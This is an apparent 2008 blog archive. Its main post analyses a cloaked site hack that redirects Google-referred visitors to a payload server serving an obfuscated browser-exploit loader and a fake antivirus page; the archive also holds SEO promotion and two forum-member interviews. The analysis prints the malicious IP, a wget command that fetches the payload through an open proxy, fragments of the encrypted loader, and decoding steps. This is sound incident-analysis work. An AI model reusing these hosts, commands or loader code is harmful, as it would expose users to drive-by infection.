Test Podcast

20 Sep 2008 In: Uncategorized


Increase conversions, sales optimizing my site, optimization tips

17 Sep 2008 In: Uncategorized


Increase conversions, sales optimizing my site, optimization tips

15 Sep 2008 In: Uncategorized


The website hack you’d never find

5 Sep 2008 In: Uncategorized

Warning: do not try the URLs here unless your system is locked down properly. I suggest using a “virtual machine” (I use VMware) to test things like this. The hack itself is complicated, the system is simple - skip the complicated part if you’re in a hurry.

It all started with a posting like this:

When I do a google search for [hide]Jonathan Wentworth Associates[/hide] the first result is:

[hide]Jonathan Wentworth Associates, LTD[/hide]
[hide]Welcome to Jonathan Wentworth Associates, a respected resource for world-class orchestral soloists,
conductors, opera, chamber music, chamber orchestras, …[/hide]
[hide]www.jwentworth.com/[/hide] - 19k - Cached - Similar pages - Note this

The: [hide]Jonathan Wentworth Associates, LTD[/hide] is highlighted and is a link to the web site. If you place the mouse over the link, it shows [hide]http://www.jwentworth.com[/hide]. However, if you click the link it immediately attempts to download the trojan. My McAfee immediately blocked it.

Looking at the page in question, it doesn’t appear to be hacked, it doesn’t appear to have any kind of scripts injected, etc. However, using LiveHTTPHeaders with Firefox, while doing the same steps (search, click on the top result) you see the following:

GET / HTTP/1.1
Host: [hide]www.jwentworth.com[/hide]
HTTP/1.x 302 Found
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Location: [hide]http://www.jwentworth.com/[/hide]

Without going through Google, the page is returned right away, just like it should. Search engine crawlers also get it like that. After the step through Google however, the site does a 302 redirect to some IP-Address and then returns to the original site. The average browser won’t see that, but if you’re quick you might spot it in the status-bar. A search engine crawler or any user who knew the address would get there without a redirect and not notice a thing.

Strange.

That’s something that deserves to be looked at more closely. What’s on that server? How could I be able to see it?

I had seen something similar a few months back which redirected me to an affiliate site the first time I went to that site through a Google referrer (in my case, the gmail.google.com referrer was enough). It would only trigger once per IP-Address. This looks like a similar hack.

When I was able to download the files, I had a nice collection of:

  • an encrypted javascript file that downloaded exploits based on browser and operating system
  • an exploit from free-spy-cam.net
  • an affiliate sales page for an antivirus software. Oh the irony. “We just infected you, buy our antivirus to get clean.” That is, if that software isn’t infected with something else.
  • an affiliate signup link on that page

A search engine crawler will never see these things. A user, coming in from Google, will get redirected and if the IP address is not known, it will trigger a few exploits based on the system the user has and then display an affiliate ad page. The next time the user comes, the redirect will happen but the normal page will be shown.
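To make that flow easier to follow, here is a minimal Python model of the behavior as observed from the outside. It is only a sketch of what the headers suggest, not the attacker's actual code: the function and class names are made up for illustration, and the assumption that the payload server keys purely on the visitor's IP address is my own reading of the "once per IP" behavior.

```python
from urllib.parse import urlsplit


def came_from_search(referer):
    """Assumed trigger: the Referer header points at a Google host."""
    if not referer:
        return False
    host = urlsplit(referer).hostname or ""
    return "google." in host


class PayloadServer:
    """Hypothetical model of the remote server: serves the exploits once per IP."""

    def __init__(self):
        self.seen_ips = set()

    def respond(self, ip):
        if ip in self.seen_ips:
            # Known visitor: bounce straight back to the original site.
            return "normal page"
        self.seen_ips.add(ip)
        return "exploits and ad page"


def visit(referer, ip, payload_server):
    """What a visitor ends up seeing on the hacked site."""
    if not came_from_search(referer):
        # Crawlers and direct visitors never get redirected.
        return "normal page"
    return payload_server.respond(ip)


server = PayloadServer()
print(visit(None, "192.0.2.1", server))
print(visit("http://www.google.com/search?q=test", "192.0.2.1", server))
print(visit("http://www.google.com/search?q=test", "192.0.2.1", server))
```

The point of the model is that only the second of those three visits ever sees anything unusual, which is why the hack is so hard to reproduce once you have triggered it.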

Spotting the hack on your site

It would be good to know how you could spot a hack like this on your site. In general, you wouldn’t be able to. You can check for this particular hack, but it might not trigger every time … not to mention that there are likely way too many hacks that you would need to check for.

A simple way to check for it would be to use wget to access the page, and check for strange redirects, eg:

>wget --user-agent Firefox --save-headers --referer "http://www.google.com/search?q=duuude" "http://www.jwentworth.com/"

However, as mentioned, that might not work every time.
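If you would rather script the check, the same idea can be sketched in Python using only the standard library. This is a rough sketch, not a complete scanner: the helper names (is_offsite_redirect, fetch_first_response, check_site) are my own, the search referrer is just an example value, and like the wget test it will miss the hack whenever the redirect decides not to trigger for your IP address.

```python
import http.client
from urllib.parse import urlsplit

REDIRECT_CODES = (301, 302, 303, 307, 308)


def _normalize(host):
    """Lower-case a host name and drop a leading 'www.'."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def is_offsite_redirect(status, location, site_host):
    """True if the response redirects to a different host than site_host."""
    if status not in REDIRECT_CODES or not location:
        return False
    target = urlsplit(location).hostname
    if target is None:
        # Relative Location header: the redirect stays on the same site.
        return False
    return _normalize(target) != _normalize(site_host)


def fetch_first_response(url, referer=None, user_agent="Firefox", timeout=10):
    """Request url once, without following redirects; return (status, Location)."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        conn = http.client.HTTPSConnection(parts.netloc, timeout=timeout)
    else:
        conn = http.client.HTTPConnection(parts.netloc, timeout=timeout)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    headers = {"User-Agent": user_agent}
    if referer:
        headers["Referer"] = referer
    try:
        conn.request("GET", path, headers=headers)
        response = conn.getresponse()
        return response.status, response.getheader("Location")
    finally:
        conn.close()


def check_site(url, referer="http://www.google.com/search?q=example"):
    """Compare a direct visit with one that claims to come from a search result."""
    host = urlsplit(url).hostname
    report = {}
    for label, ref in (("direct", None), ("from_search", referer)):
        status, location = fetch_first_response(url, referer=ref)
        report[label] = is_offsite_redirect(status, location, host)
    return report
```

Calling check_site("http://www.example.com/") returns something like {"direct": False, "from_search": True} when only the visit with the search referrer is bounced to a foreign host, which is the pattern described here. Run it from a locked-down machine, for the same reasons as the warning at the top.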

The technical details

(skip this part if you are lost already)

The original spotting of the anomaly was using LiveHTTPHeaders with Firefox, while doing the steps: search, click on the top result. You see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates

HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…
(… added space to prevent linking …)

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:05 GMT
(…)
Location: http://www.jwentworth.com/

A strange redirect like that is a really bad sign. How can we check the URL that is given to see what they are sending? Apparently it can only be triggered once per IP-address and I had already used that chance earlier. In order to view the initial page, I had to find an IP address that was not yet registered with the remote server (at least that’s my explanation). I used a proxy server from one of the lists online. Using the proxy server and wget, I was able to access the page:

>set http_proxy=81.63.140.37:3128

>wget --user-agent "Firefox" --save-headers "http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2Findex%2Ehtml"

Connecting to 81.63.140.37:3128… connected.
Proxy request sent, awaiting response… 200 OK
Length: unspecified [text/html]
20:43:23 (79.20 KB/s) - `ind.htm@src=324&surl=www.jwentworth.com&sport=80&suri=%2Findex.html.2' saved [414]

The page that was returned was a normal frameset:

HTML:

<HTML><HEAD><TITLE></TITLE></HEAD>
<frameset framespacing="0" border="0" rows="*,1" frameborder="0">
<frame name="m" src="/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt" scrolling="no" noresize marginwidth="0" marginheight="0">
<frame name="b" src="about:blank" marginwidth="0" marginheight="0" scrolling="auto">
<noframes><BODY>Frames not supported by your browser.</BODY></noframes>
</frameset><body></body></html>

The second frame was kind of funny, “about:blank”? The first one was a bit more interesting though: http://85.255.117.38/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt
Notice the “trk” parameter.

Using Opera within a VMware virtual machine running Windows 2000 (heh, paranoid is good), I was able to access that page. I saved it for analysis (and had Ethereal running on the side just to be sure). When I tried to refresh, it returned a 404. You could only view the page once.

Looking at the files you see some interesting things:

- an encrypted javascript file
- an exploit from free-spy-cam.net
- an affiliate sales page for the antivirus software
- an affiliate signup link on that page

The ZIP-File contains a full copy of the files as downloaded by the Opera browser. Check the files at your own risk, they contain the full exploit.

The encrypted javascript file looks like this (pulled apart and reformatted; called “__cntr000.htm” in the ZIP file):

JavaScript:

<script language=JavaScript>
function dc(sed) {
  l=sed.length;
  var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,56,60,51,15,9,10,13,36 (…) 52,16);
  soot=sed;
  for(j=Math.ceil(l/b);j>0;j--) {
     r="";
     for(i=Math.min(l,b);i>0;l--,i--) {
       saam=t[soot.charCodeAt(p++)-48];
       sttp=saam<<s;w|=sttp;
(…)
     dd1="document";
     dd2="write(r)";
     eval(dd1+"."+dd2)
(…)
dc("AVbFxuGqAk7s5OpH (…) G2ovPVoP9dATq_")
</script>

The contents of the file are encrypted with some variation of Base64 encoding. You can decode the javascript by replacing:
eval(dd1+"."+dd2)
with
document.write("<xmp>" + r + "</xmp>");

Doing that will display the full contents of the encrypted data (called “__cntr000-decoded.htm” in the ZIP file).

JavaScript:

(…)
  var WinOS=Get_Win_Version(IEversion);
  PatchList = clientInformation.appMinorVersion;
  switch (WinOS)
  {
   case "wXPw":
    XP_SP2_patched=0;
    FullVersion=clientInformation.appMinorVersion;
    PatchList=FullVersion.split(";");
    for (var i=0; i <PatchList.length; i++) { if (PatchList[i]=="SP2") { XP_SP2_patched=1; } }
    if (XP_SP2_patched==1) { ExploitNumber=9; }
(…)
    location.href="cnte-eshdvvw.htm?trk=zszuyhbinthnpzt";
(…)

It is yet another javascript that triggers an exploit based on the operating system (it even tests for XP Service Pack 2) and browser that the user is using. The exploit is also tagged with the “trk” parameter and couldn’t be downloaded separately. You can bet that it’s not a picture of your favorite celebrity, however.
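Going back to the decoding step for a moment: the general technique behind the dc() function (look up each character in a table of 6-bit values, shift the values into an accumulator, and emit a byte whenever 8 bits are available) can be sketched in Python as follows. Note the assumptions: the real lookup table and the rest of the loop are elided above, so the alphabet here is hypothetical, and the bit order (low bits first) is only my guess from the visible `saam<<s; w|=sttp` lines. This will not decode the actual payload; it only illustrates the idea, with an encoder added so the round trip can be checked.

```python
# Hypothetical 64-character alphabet (all codes >= 48, like the '-48' offset
# in the original); the real lookup table is elided in the listing above.
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz~"
TABLE = {ch: value for value, ch in enumerate(ALPHABET)}


def decode(text):
    """Turn characters into 6-bit values and repack them into bytes."""
    out = bytearray()
    acc = 0      # bit accumulator (plays the role of 'w' in the script)
    nbits = 0    # number of valid bits in acc (plays the role of 's')
    for ch in text:
        acc |= TABLE[ch] << nbits   # assumed order: new bits go on top
        nbits += 6
        while nbits >= 8:
            out.append(acc & 0xFF)  # emit the lowest complete byte
            acc >>= 8
            nbits -= 8
    return bytes(out)


def encode(data):
    """Inverse of decode(), included only to test the round trip."""
    chars = []
    acc = 0
    nbits = 0
    for byte in data:
        acc |= byte << nbits
        nbits += 8
        while nbits >= 6:
            chars.append(ALPHABET[acc & 0x3F])
            acc >>= 6
            nbits -= 6
    if nbits:
        # Flush the remaining bits, padded with zeros.
        chars.append(ALPHABET[acc & 0x3F])
    return "".join(chars)


sample = b"<script>/* hidden */</script>"
assert decode(encode(sample)) == sample
```

The advantage of decoding outside the browser is that nothing gets executed: you only ever look at the bytes.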

Next steps

You could follow these up with:

  • Checking the whois of the payload-server and notifying the hoster (in this case probably fruitless)
  • Checking the sales page, searching for the affiliate ID and the setups running, and complaining to the affiliate networks about this webmaster
  • Mirroring a copy of the original server for analysis
  • Obviously, moving to a different server, perhaps even a different hoster

Summary

The hacker had managed to patch the server side code (most likely the Apache server) so that
- search engines see the normal page
- new users from search engines are hacked with several exploits and shown an ad for anti-virus software

Spotting something like this on your own sites is close to impossible. The search engine crawlers would not notice anything.

Recognizing something like this algorithmically on Google’s side would be possible with the Googlebar-data. Assuming all shown URLs are recorded, they could compare the URL clicked in the search results with the URL finally shown on the user’s browser (within the frames). At the same time, the setup could be used to detect almost any kind of cloaking.
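As a very rough illustration of that comparison, here is a Python sketch. It assumes you already have the clicked URL and the list of URLs that ended up displayed (top-level page and frames); where that data would come from is outside the sketch, and the function names are made up. It is deliberately crude: plenty of legitimate pages embed frames from other hosts, so a real system would need far more than a host comparison.

```python
from urllib.parse import urlsplit


def _host(url):
    """Return the lower-cased host without a leading 'www.', or None."""
    host = urlsplit(url).hostname
    if host is None:
        return None  # e.g. about:blank has no host
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def looks_cloaked(clicked_url, displayed_urls):
    """True if any displayed URL lives on a different host than the clicked one."""
    clicked = _host(clicked_url)
    for url in displayed_urls:
        shown = _host(url)
        if shown is not None and shown != clicked:
            return True
    return False


# The frameset from this post: clicked result versus what was really shown.
print(looks_cloaked(
    "http://www.jwentworth.com/",
    ["http://85.255.117.38/site.htm?lng=1&trg=cln", "about:blank"],
))
```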

Scary stuff.

Keyword Density Checker

5 Sep 2008 In: Uncategorized

Great FREE SEO Tools

5 Sep 2008 In: Uncategorized

Have a look at these fantastic SEO tools, they have made my life and legwork for clients SO much more enjoyable.

  • https://adwords.google.com/select/KeywordToolExternal
  • https://adwords.google.com/select/TrafficEstimatorSandbox
  • http://tools.seobook.com/general/keyword/suggestions/

If you are interested, I offer an SEO Audit that tells you very specifically and on a very granular level how your site looks to a Search Engine (SE). Much of what you discover in the SEO Audit you can correct yourself (and usually rather quickly) to appear more attractive to SEs and improve your PageRank (PR) and index status (showing up higher on results pages).

Click here to - ask me about getting an SEO Audit for your site!

Interview with Craig “cass-hacks”

5 Sep 2008 In: Uncategorized

Hi Craig, welcome to my blog! Craig is, for those that haven’t noticed, an alien from some solar system far away. At least that’s the conclusion I came to after reading his introduction, the overview page on his site and his “my first computer” posts. I’m pretty sure that he’s either alien or very, very creative (as in creative writing), I mean seriously, “I built my own computer when I was 12.”?! Craig has been a frequent contributor in the Google Groups, bringing in a lot of background knowledge, helping with stylesheets, javascript and all sorts of other issues that arrive on a regular schedule.

I know that wasn’t a question but I would like to comment anyway. Although you are not the first to suggest I am not of this world, serious or not, I feel it is not so much a question of identifying the “where”, but identifying the “when”.

I think had I lived 150 to 200 years ago, I wouldn’t seem as much an alien as I do to so many people. More often than not, people who I communicate with over a period of time before ever meeting in person say something similar, I seem odd to them because they try to identify me with a place and fail but after meeting me in person, understand it is not a matter of identifying a place, but a place in time.

Many people are still put off after realizing that but a few people are able to take it in stride. You can tell a lot about a person by how they react to extreme situations and I guess I can be a bit extreme at times.

Someone once called me an “anachronistic anomaly”. That seems to describe me as well as any other description I have heard, at least descriptions appropriate for mixed company.

So Craig, with a brain the size of a planet, I’m sure you have some really smart and cool things to do. What drives you to spend so much time in the Google webmaster help groups?

Good question, as in, the best questions have no real answers. The closest I think I can come to a real answer though is that I enjoy observing how things work. One of my first memories is of my parents taking me and my two sisters to a zoo where there was a carousel. While my sisters were busy watching the pretty horses, which were just carved and painted wood, I was watching the gears and shafts and cams and wheels looking to see how it all worked.

Later, much later, when I was working with particle accelerators, some the size of 5 story buildings, there would be some sort of problem but one had to have a pretty good idea of what it was because as often seemed the case and as Murphy’s Law would have it, problems usually occurred in the least accessible spot and it could take up to a couple of days just to get to where the problem might be.

If the problem wasn’t there, all that time was wasted. But, it also wasn’t good enough just to know where the problem was, one also had to have an idea of how to fix it and maybe more importantly, how to keep it from happening again and again. All of what went into getting proficient at that was observing what one could of available data from what one could see and then coming up with a reasonable scenario as to what the cause might be where one couldn’t see and then testing that scenario as much as possible before putting any plan into action.

In Google’s Webmaster Tools Help Group, I am able to observe a lot of different situations and the more I see of a given situation, the more I have to go on to try to come up with possible scenarios to understand what may be happening. So I guess what drives me is what has always driven me, a desire to observe and understand.

How did you find the Google Webmaster Help groups in the first place? Looking at your first posts it doesn’t look like you had any particular problem that needed to be solved.

I found the group through the Google Webmaster Tools which I found through the “Add URL” page. I had just launched my first publicly accessible web site and had heard of submitting URLs to the various search engines so I asked “Professor Google” how to do it for the search engines I knew about the most and found what I was looking for. From there, I played with the Webmaster Tools for a very short time which was primarily due to there being no real data to look at when a site is first indexed and then started digging into the help files and was directed to the Groups forum. It was not so much that I was having any particular problem at the time, or since, but more so, someone felt it worthwhile to publish all that information for some reason, not reading it would seem to be a serious waste of both their time and mine.

You are right though, I didn’t have any particular problem nor do I think I would have asked had I one. I have been around long enough on various technical forums and the like to know that there is rarely a question that hasn’t been answered or doesn’t have an answer somewhere although very possibly being “hidden” and in need of being dug for.

On the other hand, I also know that for some questions, there are no answers or at least no answers likely to be forthcoming so before asking too much, I’d want to know what questions are even likely to receive an answer of any use.

But, search engines at that time I had very little experience with, other than as a search user and having already dealt with large amounts of data, it intrigued me as to how one might deal with essentially archiving the entire Internet and more importantly, making that archive available in an intelligent and useful manner. Large amounts of data don’t impress me as I’ve dealt with huge databases of tera and peta-record size but the easy, intelligent and fast access to the contained data is the real challenge.

What was it that grabbed your attention about the web? Why did you decide to put together your own website?

I wouldn’t say I was particularly “grabbed” by the web. It just seemed like a much easier platform to develop applications for. I’ve written in almost every language from machine code to C++ and at one time burning EEPROMs just to be able to test a section of code out. With PHP, Javascript and MySQL, I can whip up an application in a matter of hours. It may and very likely will look like hell but the basic functionality is there, sort of a proof of concept if you will.

As for cass-hacks specifically though, I’d built a lot of toys of various levels of usefulness over a period of time and although any one specific toy may not be all that useful, the processes that go into making them work is always useful because a given toy’s functionality is limited to what it was designed to do as well as a little bit being extensible for other purposes if designed well but the processes that go into making any toy work can be used over and over again to build whatever one can imagine. Also, every language has a lot of very simple syntax that is pretty boring to look at but can become interesting to the point of being exciting when combined in ways one might not originally have thought of.

Although straying a bit from the mark, I think the most interesting project I have documented on my site so far is one that gets the least amount of traffic. That project is a user notification system that is actually “agent” based, i.e. artificial life or as is commonly referred to as artificial intelligence, AI. Many people think that “AI” is some complex rule processor that attempts to simulate intelligent thought but that is only science fiction and pretty much had been given up on many years ago. Most of the work done in this area over the past couple of decades has been “Agent based”, creating simple little entities programmed to do very simple tasks and then releasing them to do what they were programmed to do. Where this ties in with what I have been talking about though is that once I came up with the method of implementing the functionality I wanted to support, it took me all of about 20 minutes to do it using DOM, CSS and Javascript whereas trying to do the same thing in just about any other programming environment would have taken days.

Once you have worked with different technologies, you usually get a grasp for the general problems that could come up when implementing them. What unexpected difficulties did you run into while working on your first site(s)?

This is going to be a boring answer. :-() None.

I guess from my past experience, I do things a little different than many people. I start out with a list of requirements for a given task and then look into the various methods of satisfying the requirements, with all their possible positives and minuses and then choose the available “tools” that allow me to do the most with the least. By the time I actually get to building something, it is sort of boring because then it is most often just a matter of “plugging and chugging”, a phrase I got from a Calculus professor in the past which basically means, set up the equations, plug in the variable data and then chug through the calculations. Once you got to the “Plug and Chug” stage, it was all pretty much done.

If you came to a situation where you absolutely had to get a website to rank high for competitive terms, which methods would you apply first?

Probably the first thing I would do is go out and hire an SEO. :-) Sorry, boring answer. OK, first, I’d have some limitations on whether or not I even attempted it in the first place. I’d have to be interested in and/or have some experience in the subject matter because getting different sites to rank well is not the same for all sites. Second, I’d take a look at what the past experience of the site has been and how it is doing currently and then I’d look at what are the short term and long term goals. I guess what all that means is that getting a website to rank high for competitive terms only, is a waste of time, energy and money.

But, if I didn’t care about all that and had someone else’s money to waste, I’d first make sure the site/page was even capable of ranking for the terms in the first place by making sure the terms even existed on any of the pages. Then I’d make sure there was as much information from as many different directions as possible on the subject of the target terms and then I’d work to get enough links to the site as necessary so as to make sure the page(s) was(were) even available for searches in the first place.

What I can’t do though is make people search for the targeted terms. So many people talk about wanting to rank well for this that and the other thing but so often is the case, no one is really searching for what is being targeted. I know some people use keyword generators to find out what people are searching for but I also feel that people who then decide what content to put on their site based solely on what will gain the most traffic are doing a disservice to both themselves as well as their potential visitors.

You seem to have seen a lot of corporate environments and worked in a lot of groups, is there anything about Google that was completely unexpected to you?

I feel another boring answer coming on. No, not really. Google, like all companies, is made up of people. Companies may have their policies but it is people that put them into action. A company could have the most negative policies in the world but due to the people in its employ, the company is seen in a much more positive light than a company that may have the most altruistic policies in the world with assholes implementing them.

Google seems to be the best of both worlds though, company policies seeming to tend toward ensuring equality for all involved with people implementing them that also seem genuinely concerned about the people they actually serve, the users of their various products and services. Were it not the case, I wouldn’t be sticking around because it wouldn’t make sense supporting someone else in being an asshole when I can enjoy being a much bigger one all by myself, why share? On the other hand, when I see a situation, much like with Google, where many people feel the need to view Google as evil or have ulterior motives where having any would be counterproductive, if I can in any way help someone to possibly see the other side of things, I feel I have done some good.

Were it not the case of Google being a basically positive company with obviously positive people working for it, there wouldn’t be so many of them out there putting themselves in the public eye and speaking as much for themselves as they do in efforts to try to explain as much as they can about the company they work for and with.

Turning the tables on Google, assume you had full access to everything and all the help that you needed, what would you change?

It wouldn’t really be a matter of “turning the tables” and although I definitely feel another boring answer coming on, I don’t know enough about what goes on internally to want to change anything. How could I know that what I wanted to change wouldn’t actually make things worse unless I knew why what I wanted to change was the way it was in the first place?

On the other hand, were I to have the opportunity, I would like to improve on some things, mainly things that I have been exposed to. I’d love to revamp the Webmaster tools and make them more timely and informative to the extent possible. Getting rid of tools that are of little use while expanding on others that may seem of little use but could be much more valuable if the data they offered was expanded and made more accessible to searching through. Also, I’d love to rewrite the Google Groups application as it seems to have the worst of all possible worlds.

Its use of Javascript, has to be about the most counterproductive as I have ever seen. There are also a number of things that could be done using Javascript, but aren’t currently, that could make the Groups much easier to use. About the only thing the Groups application has gotten right, in my opinion, is making it so that the functions of the Groups application work with Javascript enabled or disabled, which is actually a big accomplishment considering so many of the Javascript applications similar to it don’t work at all without Javascript.

Also, and I don’t know how much can be done in this area as I don’t know how it is currently implemented but one thing I would like to tackle would be improving the reliability of the various functions of the Groups application as it gets downright discouraging to use more often than I would like any application I was responsible for to be.

Is there anything more you’d like to add at the moment?

Other than thanking you for what has been my first interview in a LOOOOONNNNNGGGG time, I can’t think of anything I’d like to add.

Thanks for your time, Craig!

Although I’ve had a feeling this interview was coming, and dreading it, it wasn’t as painful as I thought so I thank you for making the process not too terribly intolerable!

Interview with Matt / “Dockarl”

5 Sep 2008 In: Uncategorized

Hi “Doc”, it’s cool to have you here! It’s great that the web removes barriers like the physical distance from here in Switzerland to Australia. Matt has been one of the regular contributors to the Google Webmaster Help Groups since January 2007. He has a diverse background: Agriculture and Computers, an interesting mixture, or how he puts it in his profile: “I know about cows and computers” :-).

Looking at your first posts, I see a desperate webmaster, someone even screaming for “HELP!!!” in the thread titles. How did you find the Google Webmaster Help groups and what made you decide to originally post about your problems there?

Hmm.. how did I find the groups - I think I might have searched “How to contact Google” and came across the webmaster help groups there. I had to - I’d come across a problem that I just couldn’t get an answer to by doing a regular Google search, I knew it was an unusual problem and, like many other webmasters, I figured I might be able to find a real, living, breathing Googler somewhere to talk about the problem.

Did you get a satisfactory answer to your original questions in the groups? What elements were vital to that outcome?

Well, for some reason the answers to that post (it was back in 2006) have been ‘lost in the system’ but I did get a lot of hypotheticals from the regular group members - but nothing that helped, unfortunately.

How that came about is a very long story, but hell, you’ve asked, so I’ll tell you :-). The person who owned the intellectual property we had been laboring to develop for the last two years had turned nasty - and was annoyed that we used their name on our website (and outranked them for it). My business partner and I were receiving ~20+ calls a day between us from the person. The phone calls started to elevate to the extent that we considered them threatening, and we were forced to call the police.

In the wash-up we just decided that - as a family business - we weren’t prepared to have to explain to my business partner’s kids (both under 5) why mum was crying and the police were ‘coming for a visit’ on a Saturday morning - so we decided to remove the name in question to stop further stress, even though we had every right to use it.

So I took the quickest path possible, made the changes to the website and asked Google to remove the cache. It had unintended consequences - it totally removed the ‘snippets’ from our website (our listings were title only), and we were left with a huge traffic decline. This, on top of everything else, was absolutely crippling to the business. So, by the time I posted here I was getting a bit desperate - and it’s one reason I’m generally patient with people that come to the groups angry.

In the end, unfortunately no one here could give me the answer to the problem - it was out of their control. I hadn’t realized that a cache removal would remain in effect for 6 months. The main element that was vital to my outcome was Vanessa Fox (the beaut person that she is) who saw my post and stepped in and tweaked the system to let my site back in.

You’re a webmaster, you had issues with your site and Google and posted in the groups. If a webmaster came up to you and asked if it would be worthwhile to post about his problems there, what would you tell them? Would it make any difference if the webmaster was new to webmastering?

That’s an easy question. We’ve got a great community of beaut people here - you just don’t spend hours helping people gratis unless you’re passionate about it, so we tend to be universally ‘nice’ to people, especially newbies. I’d say ‘Go ahead, write your question, try to be succinct about it and TRY NOT TO PANIC!’. I’d also make sure that they knew that the people helping would more than likely be knowledgeable volunteers, so make sure you check your frustration at the door.

What was it that made you stick around in the Google Groups, not only to ask more questions but also to help answer other people’s questions? What makes the Groups special compared to other forums?

Well I think that JLH and yourself made the effort to email me and help with some problems I was having with a hobby site of mine called ‘utheguru’ - that was an awesome gesture and made me feel at home. That kind of thing, along with the occasional guest post by a Googler, is what makes this forum special.

In parallel to that, things had degenerated a lot further with our business to the extent that lawyers had become involved, and I had to put my PhD (and hence, income) on hold to spend my time dealing with that. I was looking for a stress release, and I’ve always been the kind of person that finds learning natural, cathartic and relaxing - so I got hooked.

If I’m honest, I also figured it was a way I could work towards another goal of mine - working with Google.

As an undergrad student, I read Page and Brin’s paper, and thought - “wow, that’s a neat idea”. The whole concept of PageRank and linkages is something that’s really been around in science for hundreds of years. A good scientific paper is one that references other authors widely, and a reputable scientist is one that has papers referenced by many others. The CONCEPT of PageRank is really nothing new in science - it just took a neat idea by those two fellows to convert the concept into something that could transcend academia and become relevant to that new thing called ‘the Internet’. Google became popular, first, amongst scientists - that’s something I observed and there was certainly a lot of buzz about it within that sector of society before it ever became the household name it is now.

I’ve been a Google user ever since, and I’m fascinated by the system itself, how it works, the company, the culture - everything about Google appeals to me.

Further to the reasons Google fascinates me (you didn’t ask but I’m gonna tell you anyway.. haha), before the rather wild ride of backless lingerie began, I’d worked for some time as a Scientist with the Sugar industry (especially on the field / mechanisation side), and one of the major things I worked on there was reward algorithms - trying to use disparate manufacturing measures at the mill end of the system to send ‘quality’ signals to harvester operators. Hmmm.. how do I explain this - well, I’ve gotta go into a little background detail…

Sugarcane harvesters chop up cane into little lengths, about 8 inches long, called billets. Along with the cane, the leaf material is also chopped up. If that leaf material reaches the mill, it can have a bad effect on the quality of the sugar produced, and it also makes the cane more expensive to process and transport. So, the harvesting machines have big 6 foot metal fans which rotate at about 1000 rpm - that’s a phenomenal tip speed. These fans sit above the cane right after it’s been chopped, and their aim is to remove the leaf material. Unfortunately, a whole complex set of interactions conspire to result in a situation where if you try ‘too hard’ to remove the leaf material, you also end up losing about 20% of the cane you harvest through those fans - but it’s invisible. A billet that’s gone through an extractor fan ends up looking something like desiccated coconut - and there is no way of knowing the losses exist unless you do scientific trials to prove it.

I’d done the trials - all through North Queensland, in Papua New Guinea - all over the place. We had proved the losses existed, and the cost to the industry was in the billions of dollars per year, let alone the environmental impact. But because you can’t actually SEE the losses, you have a hard time convincing people that they actually exist. We got to the stage where my team and I had convinced the industry that there was a serious problem, and the next step was obviously “How do we stop it?”. We knew that there was a ‘sweet spot’ where those losses could be reduced to around 5% depending upon the way the harvester was operated. Since we didn’t have the ability to measure what was happening in the field on a real time basis, we had no choice but to use indirect measurements in the mill - like fibre, the sweetness of the cane etc. - to try and infer what was happening in the field - to measure ‘quality’ of the job.

That became my focus, and I learnt along the way that when you’re trying to make a reward system based upon derived measures, the tiniest little change to your algorithm can have huge impacts upon the system you’re trying to model. Also, if you’re offering “rewards” based upon indirect measurements, you actually end up becoming an intrinsic part of the system you’re trying to model - in clearer terms, the whole system tends to change or adapt to maximize “profits”, which can play havoc with the “accuracy” of your algorithm.

It sounds completely unrelated, but that’s actually Google (and the spam struggle) in a nutshell. That’s one of the reasons I’m fascinated with it and feel at home here in the groups, where occasionally we get questions that make me think quite deeply about the challenges Google must face - and we get the opportunity to debate our views. This thread about PageRank, where Craig and I duked it out with full respect for each other’s opinion, is one example I can think of that I’ve enjoyed.

You studied Agriculture and set up a shop to make and sell backless lingerie. I bet all the guys in the groups have visited your full site (for SEO reasons, I’m sure). How did that ever come about?

Ha - not only did I study Ag, but I managed to convince the government here to award me a scholarship to do a coursework Master’s degree in Computer and Comms engineering. I ended up with a few awards and an aggregate score of over 93% - without an undergrad engineering degree - I think that surprised everyone, even me :-). But I guess it’s only natural - most people do best when they’re doing something they love. I’ve always been fascinated with those applications where IT, Engineering and Science intersect and meet ‘the real world’ - that’s kind of Googly.

An example - I can remember the time when I was about 12 years old that I blew up the family Commodore 64 trying to get it to drive solenoids to water the garden for Mum. I didn’t realise at the time that you need a transistor and a relay if you want to drive something hefty like a solenoid with a TTL output.

But apart from being a bit of a terror, I’ve also always been a traveler and got along easily with folks. As such, when I was writing my Masters thesis, I figured I’d go stay with some mates overseas - I had a load of frequent flyer points I wanted to use, they all offered to put me up for free, so I figured it was an opportunity too good to miss. The only ‘gotcha’ was that I was to provide the beer - Norway was a hoot - my oh my - the Vikings ARE NOT dead!

I ended up (between parties) writing most of my Master’s degree tapping away on my laptop, perched on the edge of a fjord whilst staying with my Norwegian Marine Biologist friend in Northern Norway for a few months mid 2005 - the 24 hour sunlight was GREAT.

On the way back I dropped in to see my Indian mate in Tirupur (the south of India, in a state called Tamil Nadu) and ended up spending a few months there too. Tirupur is a big textile producing area, and I made friends with some of the big players there.

